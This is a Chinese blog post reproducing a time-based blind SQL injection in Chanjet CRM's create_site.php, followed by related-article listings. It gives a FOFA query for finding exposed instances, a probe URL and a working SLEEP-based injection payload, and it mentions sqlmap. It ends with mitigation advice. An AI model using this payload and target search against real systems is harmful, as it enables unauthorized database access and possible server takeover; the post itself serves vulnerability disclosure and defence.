【畅捷通-畅捷CRM|create_site.php处存在SQL注入漏洞复现】

最新推荐文章于 2024-07-16 09:28:46 发布
最新推荐文章于 2024-07-16 09:28:46 发布
阅读量231 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: php sql web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45530380/article/details/132270982
版权

畅捷通CRM|create_site.php处存在SQL注入漏洞复现

漏洞描述

用友畅捷CRM create_site.php处存在SQL时间盲注 ,未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径。
攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。

漏洞复现

FOFA:app=“畅捷通-畅捷CRM”
在这里插入图片描述

payload:/WebSer~1/create_site.php?site_id=1

在这里插入图片描述

出现以上弹窗内容,证明漏洞存在

构造payload如下延时后弹窗

/WebSer~1/create_site.php?site_id=1+AND+%28SELECT+6663+FROM+%28SELECT%28SLEEP%285%29%29%29lbcfz%29

也可通过sqlmap测试

漏洞复现

畅捷通CRM版本官方已经不再维护,建议受影响的用户收敛系统仅内网访问或部署WAF

新疆东坡肉
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现畅捷CRM SQL注入
失心少年
07-17 589
术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!用友畅捷CRMcreate_site.php存在SQL时间盲注,未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
畅捷CRM SQL注入漏洞复现
0xSec
06-13 1611
用友畅捷CRMcreate_site.php存在SQL时间盲注,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
复现畅捷通T-Plus SQL注入漏洞_65
fushuang333的博客
03-17 851
复现畅捷通T-Plus SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
(附nuclei 批量验证文件)用友 畅捷通T+ MultiCompanyController SQL注入漏洞
nglj9527的博客
05-29 198
用友 畅捷通T+ MultiCompanyController 存在SQL注入漏洞,执行sql语句,获取数据库信息。
畅捷通T+SQL注入漏洞
holyxp的博客
07-27 844
畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。畅捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
漏洞复现】用友畅捷CRM存在SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
05-06 1087
用友畅捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 " 提升营销能力,网罗天下商机"。用友畅捷CRM存在SQL注入漏洞,攻击者可通过使用工具获取数据库相关敏感信息,拿到服务器控制权限。
【1day】复现用友畅捷CRM create_site.phpSQL注入漏洞
记录并分享学习安全的知识点..
08-08 316
用友CRM是专为小企业量身打造的智慧型客户关系管理应用,它包括客户、商机、报价、团队管理、客户营销、客户服务、主题查询及统计分析,帮助企业管好客户、管好业务员、做好销售业务;系统还提供通知、审批、短信、文档、任务等协作功能,提高销售团队的协作效率,其中 create_site.php接口存在时间盲注漏洞
畅捷CRM亮点及操作说明.pptx
09-21
畅捷CRM】是一款专为小企业设计的智能客户关系管理系统,旨在提升企业的销售业绩和团队协作效率。这款系统包含了线索管理、客户管理、商机跟踪、报价、订单、收款、服务、销售分析等多个核心功能,同时也提供了...
畅捷CRM115产品介绍--XXXX07.pptx
09-21
畅捷CRM115产品介绍】是一款专为小企业设计的智能化客户关系管理系统,旨在提升销售业绩,解决企业管理中的诸多挑战。这款产品由畅捷通信息技术股份有限公司于2012年7月推出,主要关注协同销售和内部效率的提升。 ...
畅捷服务联盟精品课程-进销存特殊业务理.pptx
06-29
畅捷服务联盟精品课程-进销存特殊业务理.pptx
畅捷CRM 存在SQL注入+后台文件上传漏洞
qq_58091216的博客
12-07 1144
畅捷CRM是面向小企业全力打造的简单、实用的客户关系管理应用!畅捷CRM帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在SQL注入和后台文件上传漏洞,攻击者可以通过上传木马执行任意命令,获取服务器管理权限。
漏洞复现】用友畅捷通T+ SQL注入漏洞
2301_79099363的博客
07-13 1408
漏洞复现】用友畅捷通T+ SQL注入漏洞
畅捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0xSec
06-14 3701
畅捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
某知名系统漏洞挖掘与利用思路探索
C20220511的博客
09-19 1161
本文以安全研究为目的,分享对该套系统的代码审计和漏洞挖掘过程,文中所提到的漏洞均已提交给CNVD&CITIVD,请勿用做非法用途。
sql注入思路(登录界面)和网络常用端口
u011975363的专栏
04-11 7373
当遇到如图的界面时,没有验证码,我们可以尝试以下几种方法进行SQL注入,以获得正确的登录账户和密码。 要搜索类似的页面可利用百度高级搜索语法:admin inurl:login.php/asp 注入的方法: 1、利用sqlmap (1)sqlmap 和burpsuite相结合,利用burpsuite捕获post数据包,保存为:packet.txt, 从用户名或者密码中任选一个...
ns3-gym入门(二):linear-mesh例子详解
zoe2222226666的博客
07-15 889
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
喰星云·数字化餐饮服务系统 多 SQL注入漏洞复现
0xSec
07-14 461
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
【框架】PHP框架详解-symfony框架
最新发布
Xiaoxin的博客
07-16 814
1. 起源与开发者Symfony由SensioLabs(现为Symfony公司)开发,最初由Fabien Potencier于2005年创建。Symfony框架自发布以来,经历了多个版本的迭代,每个版本都引入了新的特性和改进,以满足不断变化的Web开发需求。2. 设计理念Symfony框架遵循MVC(Model-View-Controller)设计模式,将应用程序分为模型、视图和控制器三个核心部分,有助于实现代码的分离和重用。
畅捷crm v11.5安装包
10-30
畅捷CRM V11.5是一款用于企业客户关系管理的软件,它提供了销售、市场营销、客户服务等功能,帮助企业提升销售业绩和客户满意度。要安装畅捷CRM V11.5,首先需要下载安装包。安装包通常可以从畅捷CRM官方网站或授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值